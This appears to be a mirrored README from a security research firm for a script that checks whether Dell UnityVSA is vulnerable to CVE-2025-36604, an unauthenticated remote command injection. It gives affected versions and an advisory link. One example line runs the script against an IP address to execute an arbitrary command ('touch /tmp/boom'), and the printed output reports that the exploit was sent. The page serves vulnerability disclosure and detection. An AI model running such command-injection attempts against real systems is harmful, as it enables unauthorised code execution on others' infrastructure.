Share
## https://sploitus.com/exploit?id=521F25D0-F7F8-54D3-9F0E-9527272BE665
# watchTowr-vs-Dell-UnityVSA-CVE-2025-36604

Detection Artifact Generator for Dell UnityVSA CVE-2025-36604



https://github.com/user-attachments/assets/28488a97-7845-4b78-9fe7-64b9172ab023



See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action

```
python watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604.py --target https://192.168.5.45/ --command "touch /tmp/boom"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(   \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-Dell-UnityVSA-CVE-2025-36604.py

        (*) Dell UnityVSA Unauthenticated Remote Command Injection Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-36604]

[+] Sent exploit to https://192.168.5.45

```


# Description

This script attempts to detect if Dell UnityVSA is vulnerable to CVE-2025-36604

# Affected Versions

Versions prior to 5.5.1	are affected by this issue

For more information visit [Dell UnityVSA Security Update Notes](https://www.dell.com/support/kbdoc/en-uk/000350756/dsa-2025-281-security-update-for-dell-unity-dell-unityvsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities)


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/

- https://x.com/watchtowrcyber